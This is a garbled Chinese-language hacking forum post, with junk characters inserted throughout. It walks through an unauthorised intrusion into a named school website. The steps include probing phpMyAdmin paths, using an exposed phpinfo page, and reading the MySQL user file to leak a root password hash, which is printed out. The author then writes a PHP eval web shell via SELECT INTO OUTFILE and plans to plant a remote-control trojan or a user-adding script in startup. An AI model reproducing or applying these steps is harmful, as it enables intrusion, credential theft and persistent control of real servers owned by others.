3、magic_quotes_gpc()=OFF
2 n2 ^. Z! \1 G1 [" k
2 r, L/ \7 J! H; I- ]' H
试着爆绝对路径:
* u) T$ ^6 |4 t. {
1./phpMyAdmin/index.php?lang[]=1
q- o I+ a+ A/ s
2./phpMyAdmin/phpinfo.php
3 }8 A& y9 w* B
3./load_file()
. u5 @, m- G' z# j9 H' q W4./phpmyadmin/themes/darkblue_orange/layout.inc.php
1 M4 D: R8 _# R: W2 G5./phpmyadmin/libraries/select_lang.lib.php
) |6 w+ U. B6 E6 b& M6./phpmyadmin/libraries/lect_lang.lib.php
9 S* {1 r* ~6 Q
7./phpmyadmin/libraries/mcrypt.lib.php
R, ^( D! z. o5 e
8./phpmyadmin/libraries/export/xls.php
8 V9 U- m. Q! ]# r) v! f$ O3 l. Q8 _' V
均不行...........................
" h0 X. B4 @9 y" |# q; P
w- }3 e' l( [9 z) [0 v0 Q御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
3 e# h q& k6 e! q. h4 w8 D" ?9 v0 U3 k
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
1 ?6 x) c" w/ r. `7 G0 h4 _
, L1 b, X# }; @9 l' W8 k$ R) N) h
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
' w% l2 v0 p6 R" t. P2 I9 d; g# v% R
- n0 l# B1 K! `4 s" L% S6 _0 D! l/ ?* Q) D
敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
1 F0 v# B) {/ x2 T0 L9 D1 s& O+ w4 [+ G' M" W( w5 |
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
* t$ |( c |+ [( J+ e$ b
& z4 y" ?( j1 i8 C% l
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
1 i2 J/ L5 ]6 H6 y9 _/ G- f6 W
4 E) N# [, v7 ?7 K7 P1 T
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
! {% n1 Z0 e7 B" s
5 x% V" |" s( ~9 S. V" J# B成功读到root密码:
9 k7 K: Z( O5 V8 N$ j& e) r
$ N+ i) D+ ~) A8 I17---- r(0072)
; V1 w6 y. V2 L& V/ O7 W! R/ n! g
18---- o(006f)
- N0 |: ^. w I3 g
19---- o(006f)
0 G* ^+ S8 o$ o$ h" r20---- t(0074)
# V+ Z, N' V. C0 I0 X8 z6 Y
21---- *(002a)
( P" m, W/ g! \8 u; h1 R. j
22---- 8(0038)
! H; j) F, a1 R' P7 j' \
23---- 2(0032)
! l: q) E( ~$ M6 r. M/ ]2 \+ s4 Z
24---- E(0045)
# T' @9 M& Y4 H6 }% z8 ~# l25---- 1(0031)
/ y, Y+ e" b3 X; X1 B26---- C(0043)
4 y# H" q n- K# f" u& v" A27---- 5(0035)
# f& A4 F( q) ?4 e
28---- 8(0038)
8 E( u: ?% t" q% e4 P29---- 2(0032)
7 ?% `8 U4 [9 _
30---- 8(0038)
5 [6 h. c0 n9 V* {. B& ~
31---- A(0041)
+ R Z d, M( A. x4 T
32---- 9(0039)
8 L" x( }8 ?( L l" X9 j9 |+ K33---- B(0042)
) H& Y: R& q L6 \' r9 Q5 o0 L/ N34---- 5(0035)
$ U. {5 j$ y/ L8 A( F y' B8 I
35---- 4(0034)
* {+ {$ h) U' T36---- 8(0038)
, G, b/ k4 Z+ n; P6 K. `2 ^37---- 6(0036)
: X; Y4 H A' A0 M38---- 4(0034)
) b( O; i! a1 O5 D. h5 Q6 C) Y
39---- 9(0039)
$ J6 r7 d, T0 z1 g' ^" I
40---- 1(0031)
( [$ Q3 ]4 X: G* X# ?41---- 1(0031)
4 R1 a' i0 E/ {7 J2 H3 [* h" I3 C
42---- 5(0035)
) T9 p* Z* X. O7 x! }
43---- 3(0033)
0 h7 C6 J8 e) Y) S/ _0 O
44---- 5(0035)
: R5 t# v5 ~( h: C/ O
45---- 9(0039)
" ]& Z2 k! r) a( O; E46---- 8(0038)
8 e' I$ Z; a' U/ |6 o+ b
47---- F(0046)
9 ~# K' Y% n. Y) d- O
48---- F(0046)
* [7 r+ [" E! j# A( J7 g7 F: \49---- 4(0034)
' ~' x' c1 X f/ k; ]5 ~
50---- F(0046)
4 g( X7 t2 g! ]% E1 R51---- 0(0030)
% p. `, ^6 A1 i' P8 i7 J52---- 3(0033)
$ m! _( w1 i$ D" ^7 q: W
53---- 2(0032)
5 @3 s3 n# @' B, w# |4 q* C54---- A(0041)
+ G" `, O. ?" f" m, {' W% G
55---- 4(0034)
4 B3 w0 R5 Q5 p& Y( A: x
56---- A(0041)
+ M" B# V* _0 ]) C
57---- B(0042)
! C0 H8 G$ D1 _/ ^7 Y58---- *(0044)
3 {% s/ N9 i: q' F8 `3 C/ b# S! r. g59---- *(0035)
% U- a. V5 T) o* H, R, {
60---- *(0041)
+ _( a0 w8 h6 J* x7 o- j! x; {
61---- *0032)
6 N, `& ]* J5 U+ b' V
1 E/ N- d! b" Y& V3 t解密后成功登陆phpmyamin
8 S0 Q/ `. x" I( o " h) u9 C5 ~1 @4 b. O: e
- R) |& i% G( ]$ [
[attach]164[/attach]
- e. t' |+ B- @* t2 J0 O
! g6 M% i3 H' g0 t* Y- a找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: E- \# {" \5 Y; H1 ?/ P3 {
( q) @' u0 y i" x/ f% P
成功执行,拿下shell,菜刀连接:
0 t, D' a5 o! D6 A# y0 s
! @- I; w4 M( t( C
服务器不支持asp,aspx,php提权无果...................
( n6 e9 J e8 Z- A
' ~0 A" G t8 r4 Y" A2 Y/ v
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
) z: }' W" t/ B$ j3 b- m! _
